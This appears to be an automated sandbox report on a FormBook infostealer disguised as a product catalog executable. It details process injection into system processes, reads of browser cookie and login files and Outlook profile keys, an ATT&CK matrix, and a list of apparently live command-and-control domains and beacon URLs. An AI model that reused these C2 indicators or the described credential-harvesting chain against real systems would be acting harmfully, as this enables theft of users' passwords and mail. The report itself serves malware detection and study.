            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\find.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\find.exeThread register set: target process: 8028Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeThread APC queued: target process: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeJump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2BF1008Jump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0043916A LogonUserW,0_2_0043916A
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D6D0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_004375B0
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_00436431
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Products Order Catalogs20242.exe"Jump to behavior
            Source: C:\Program Files (x86)\dSwxdjkuSEReMVeVWqqSXObDVtTIShbNZSDsvYChQR\brfQTUZMGd.exeProcess created: C:\Windows\SysWOW64\find.exe "C:\Windows\SysWOW64\find.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\find.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00445DD3
            Source: Products Order Catalogs20242.exe, brfQTUZMGd.exe, 00000005.00000002.4191752946.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000000.2105042714.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259558090.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: brfQTUZMGd.exe, 00000005.00000002.4191752946.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000000.2105042714.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259558090.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: Products Order Catalogs20242.exeBinary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: brfQTUZMGd.exe, 00000005.00000002.4191752946.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000000.2105042714.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259558090.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: brfQTUZMGd.exe, 00000005.00000002.4191752946.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000005.00000000.2105042714.0000000000EA1000.00000002.00000001.00040000.00000000.sdmp, brfQTUZMGd.exe, 00000007.00000000.2259558090.0000000001380000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_00410D10 cpuid 0_2_00410D10
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson,0_2_0042039F
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\find.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\find.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: Products Order Catalogs20242.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
            Source: Products Order Catalogs20242.exeBinary or memory string: WIN_XP
            Source: Products Order Catalogs20242.exeBinary or memory string: WIN_XPe
            Source: Products Order Catalogs20242.exeBinary or memory string: WIN_VISTA
            Source: Products Order Catalogs20242.exeBinary or memory string: WIN_7

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000006.00000002.4192235926.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4192191360.00000000034E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4190820397.0000000003030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2191147685.00000000061F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2180613209.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.4192038836.0000000003020000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.2181390912.0000000004450000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4191938504.0000000000D10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
            Source: C:\Users\user\Desktop\Products Order Catalogs20242.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS116
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets241
            Security Software Discovery
            SSH2
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528626 Sample: Products Order Catalogs20242.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 28 www.sailforever.xyz 2->28 30 www.majorconcept.xyz 2->30 32 23 other IPs or domains 2->32 42 Malicious sample detected (through community Yara rule) 2->42 44 Multi AV Scanner detection for submitted file 2->44 46 Yara detected FormBook 2->46 50 5 other signatures 2->50 10 Products Order Catalogs20242.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 30->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 13 svchost.exe 10->13         started        process6 signatures7 66 Maps a DLL or memory area into another process 13->66 16 brfQTUZMGd.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 find.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 brfQTUZMGd.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.sailforever.xyz 103.106.67.112, 49793, 80 VOYAGERNET-AS-APVoyagerInternetLtdNZ New Zealand 22->34 36 pinkpantys.shop 84.32.84.32, 50018, 50019, 50020 NTT-LT-ASLT Lithuania 22->36 38 10 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Products Order Catalogs20242.exe21%ReversingLabs
            Products Order Catalogs20242.exe29%VirustotalBrowse
            Products Order Catalogs20242.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            osi.garden0%VirustotalBrowse
            www.aed.shopping0%VirustotalBrowse
            natroredirect.natrocdn.com0%VirustotalBrowse
            www.sailforever.xyz1%VirustotalBrowse
            www.dealsbyaustin.online1%VirustotalBrowse
            concept.pink0%VirustotalBrowse
            home.portfolioboxdns.com1%VirustotalBrowse
            www.majorconcept.xyz1%VirustotalBrowse
            pinkpantys.shop0%VirustotalBrowse
            www.concept.pink0%VirustotalBrowse
            www.luxurylive.xyz2%VirustotalBrowse
            www.portfolioalex.net1%VirustotalBrowse
            www.sdfhfgoool10.life1%VirustotalBrowse
            www.sharilyn.org0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.luxurylive.xyz/8j8d/3%VirustotalBrowse
            https://dts.gnpge.com0%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            osi.garden
            68.65.122.222
            truefalseunknown
            jiq19281.jisuw-cdn.jiasula.vip
            185.121.178.197
            truefalse
              unknown
              www.aed.shopping
              35.214.185.243
              truefalseunknown
              sdfhfgoool10.life
              3.33.130.190
              truefalse
                unknown
                natroredirect.natrocdn.com
                85.159.66.93
                truefalseunknown
                www.my1pgz.pro
                156.227.17.86
                truefalse
                  unknown
                  www.hcpf.xyz
                  104.21.48.76
                  truetrue
                    unknown
                    www.sailforever.xyz
                    103.106.67.112
                    truetrueunknown
                    www.dealsbyaustin.online
                    208.91.197.27
                    truefalseunknown
                    concept.pink
                    217.160.0.27
                    truefalseunknown
                    home.portfolioboxdns.com
                    34.251.91.168
                    truefalseunknown
                    luxurylive.xyz
                    84.32.84.32
                    truetrue
                      unknown
                      www.hellosmall.info
                      184.94.215.26
                      truefalse
                        unknown
                        pinkpantys.shop
                        84.32.84.32
                        truefalseunknown
                        www.luxurylive.xyz
                        unknown
                        unknowntrueunknown
                        www.concept.pink
                        unknown
                        unknowntrueunknown
                        www.sharilyn.org
                        unknown
                        unknowntrueunknown
                        www.majorconcept.xyz
                        unknown
                        unknowntrueunknown
                        www.32456.xyz
                        unknown
                        unknowntrue
                          unknown
                          www.pinkpantys.shop
                          unknown
                          unknowntrue
                            unknown
                            www.osi.garden
                            unknown
                            unknowntrue
                              unknown
                              www.portfolioalex.net
                              unknown
                              unknowntrueunknown
                              www.sdfhfgoool10.life
                              unknown
                              unknowntrueunknown
                              NameMaliciousAntivirus DetectionReputation
                              http://www.pinkpantys.shop/cyro/false
                                unknown
                                http://www.luxurylive.xyz/8j8d/falseunknown
                                http://www.majorconcept.xyz/pvqa/false
                                  unknown
                                  http://www.dealsbyaustin.online/vikk/?2FO=QBbT1R8&FJiPC=Vwm3+xEBUAulxK0F/Lnzrwv8wIKeamv3GC2vqAJo9BSRvdXyR+/4nl5nZn54cU6IqZGvOoCIPeejeQQ8mZnJIpSF+K87khcOo5HnxJigNxRW7ek1bxUyIJ4=false
                                    unknown
                                    http://www.sdfhfgoool10.life/3gg7/false
                                      unknown
                                      http://www.sdfhfgoool10.life/3gg7/?FJiPC=2+LBIiP/KoEhdnR3xwwMWckHXd3s+f0VYUCn+2NFE1occ+/W1XHNdoCDAgJCjDzuYXNE98f+eghrY5vQi1M98KcZ1LEUY4gMUibOg5uc8EJhnuelY3pNbdk=&2FO=QBbT1R8false
                                        unknown
                                        http://www.hellosmall.info/skre/false
                                          unknown
                                          http://www.sailforever.xyz/uahh/?2FO=QBbT1R8&FJiPC=d5+MqVgVjHVNiwBxeGRD++FKVLlNYwBNfU+SeMm5F41Ss+LbbNQ+rUwfOJuObD11rI3Ncym0QxlhV9b+bLppILaSvV9n+mKxlSe4ZqDWTkAi7XxGHJdw410=false
                                            unknown
                                            http://www.hcpf.xyz/cauy/false
                                              unknown
                                              http://www.portfolioalex.net/qc9x/?FJiPC=CH6es5sz3Yp3Dzc51aPhdqkDrs8TQW5n7Byc8aIZtNO3gPawIMb4v5YCCRVXNYl8oq0F7aM/LA9nPzXcA0LmQW2fPOlpD7vAsWT5J3PgK+m9VafrfVSbrXQ=&2FO=QBbT1R8false
                                                unknown
                                                http://www.32456.xyz/ucj8/false
                                                  unknown
                                                  http://www.pinkpantys.shop/cyro/?2FO=QBbT1R8&FJiPC=D2ou5qRFRedTipDENHRzVKYWOwvjKcFZBYoEL10S44zk2vemCWVH9CYUDPjN2ps8GyxUcJ8ddPkdaoLhExzDkdmbipzXnEU922bDAaSjGv786nVvzAi8BXE=false
                                                    unknown
                                                    http://www.aed.shopping/v90x/false
                                                      unknown
                                                      http://www.osi.garden/ow1m/false
                                                        unknown
                                                        http://www.32456.xyz/ucj8/?FJiPC=/OR0Gv3ARcC+oTiwVlgFvwfWLEZCPeymrzbXKOUlZ8hivfSIFELupuZNSeyona1zEh6C2fNDDz82Ku8poS/qbWUXFcIy31WMkdwjMbbyMeUh4DnqyXBk2Zk=&2FO=QBbT1R8false
                                                          unknown
                                                          http://www.luxurylive.xyz/8j8d/?2FO=QBbT1R8&FJiPC=lh9QeGQC50ZZ373XfJvrGDHHrSYqS///Rp9Ie6Cn/EIA2xGtYDPraNKli8GbiMktAJPkHJ/Gg+u1HXJ6v54myfeer2iKmQcCA8UVbpnYVYElllWY0U7drCk=false
                                                            unknown
                                                            http://www.hcpf.xyz/cauy/?2FO=QBbT1R8&FJiPC=PyTdyf7MBTV+gxszcm/SLHpt+YfE++r+U3XVnpxfSjDO6QTtkkjvi3Yn5wnWcyf5TfAKBJM6K26qTiz5xiPid6ZOvGIKLUwhcowB8dEz9H7fOuc+NjQG9Jg=false
                                                              unknown
                                                              http://www.portfolioalex.net/qc9x/false
                                                                unknown
                                                                http://www.hellosmall.info/skre/?FJiPC=S+TX00U190oTp+a4+Mh6JOZKCfYk0qlS074izuiXtvjO4IlC6yG6IaWxS8JxCfvRqFT3VFWs4J33oL1Eg51tY/qkmOhlT5GkiLFdmWmV2m3xIoZVeIF78zA=&2FO=QBbT1R8false
                                                                  unknown
                                                                  http://www.majorconcept.xyz/pvqa/?2FO=QBbT1R8&FJiPC=RLO5tcrCxJ5DbW4ZedTWBrzvBFkjbCggWXFTSCpZqt8FDcaILdRtdicCHXUrgshims5J8KWD1CKv/qFrWuRiVZ2kzqB7qEFPi/ItjJ1l7CTi/QfqH6jG1C0=false
                                                                    unknown
                                                                    http://www.dealsbyaustin.online/vikk/false
                                                                      unknown
                                                                      http://www.osi.garden/ow1m/?FJiPC=R0yC5R5LP37B+u7B47HBXCMiDtCwIfqPeOyqn1JZ4Ps9251xIaYYVL4nlvdWIAmm2UCAT0/m7O8NiPdCRWmEjk79M6Z+SJR86MwZjCyaTxX5jc3tUJ4oGgs=&2FO=QBbT1R8false
                                                                        unknown
                                                                        http://www.aed.shopping/v90x/?FJiPC=SV8zM0DpGKPq5vcKLjD0JfM0MkEh6YkwwbH6C33UC6CYdO1WGea88eauSogomnSMda8dbXQuQyBLu8v2S1S6T9QpW/51AxWZgFCLTAInw3sN81zK2reHc4Q=&2FO=QBbT1R8false
                                                                          unknown
                                                                          http://www.my1pgz.pro/9jmy/false
                                                                            unknown
                                                                            http://www.my1pgz.pro/9jmy/?FJiPC=46rRghiH6UTMn5OdV0QmjQpTcS7uy0k/o2ugMl2w7VO9VKzwkLZc8aFCTSwfTjrwCajqXliJ4PKjo2fEacCh39HPVzKyhYEUGCUQRILZoBZxTwgJ2Hx73+k=&2FO=QBbT1R8false
                                                                              unknown
                                                                              NameSourceMaliciousAntivirus DetectionReputation
                                                                              https://duckduckgo.com/chrome_newtabfind.exe, 00000006.00000003.2378250788.00000000082AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
